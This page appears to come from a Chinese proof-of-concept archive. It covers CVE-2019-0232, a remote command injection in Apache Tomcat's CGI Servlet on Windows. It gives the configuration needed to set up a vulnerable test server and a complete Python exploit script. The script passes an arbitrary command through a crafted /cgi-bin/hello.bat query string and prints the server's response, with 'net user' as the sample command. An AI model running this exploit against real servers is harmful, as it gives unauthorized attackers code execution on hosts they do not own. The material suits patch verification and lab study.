关联漏洞
标题:
Apache Tomcat 操作系统命令注入漏洞
(CVE-2019-0232)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 9.0.0.M1版本至9.0.17版本、8.5.0版本至8.5.39版本和7.0.0版本至7.0.93版本中的CGI Servlet存在操作系统命令注入漏洞。远程攻击者可利用该漏洞执行代码。
描述
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
介绍
# CVE-2019-0232
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
`Windows上的Apache Tomcat远程执行代码 cgi-bin`
# 使用:
```
Usage: python CVE-2019-0232.py url cmd
```
# 测试环境:
```
jdk8
apache-tomcat-8.5.39
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/bin/apache-tomcat-8.5.39.zip
```
## 漏洞搭建:修改conf目录配置文件 启功CGI,启动tomcat server服务
#### 参考 https://github.com/pyn3rd/CVE-2019-0232
#### apache-tomcat-8.5.39\conf\web.xml
```
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
```
#### apache-tomcat-8.5.39\conf\context.xml
```
<Context privileged="true">
<!-- Default set of monitored resources. If one of these changes, the -->
<!-- web application will be reloaded. -->
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
<!-- Uncomment this to disable session persistence across Tomcat restarts -->
<!--
<Manager pathname="" />
-->
</Context>
```
## 编写python脚本:
```
import requests
import sys
# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
url = sys.argv[1]
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]
vuln_url = url + url_dir +cmd
print '''
_______ ________ ___ ___ __ ___ ___ ___ ____ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / /
| |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_
\_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____|
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
By Jas502n
'''
print "Usage: python CVE-2019-0232.py url cmd"
print "The Vuln url:\n\n" ,vuln_url
r = requests.get(vuln_url)
print "\nThe Vuln Response Content: \n\n" , r.content
```
## 参考链接:
https://github.com/pyn3rd/CVE-2019-0232
文件快照
[4.0K] /data/pocs/5c5a43c1390e255c4383f47a5ffde7ea92978337
├── [258K] CVE-2019-0232.png
├── [1.0K] CVE-2019-0232.py
├── [313K] net-user.jpg
├── [2.7K] README.md
└── [274K] whoami.jpg
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。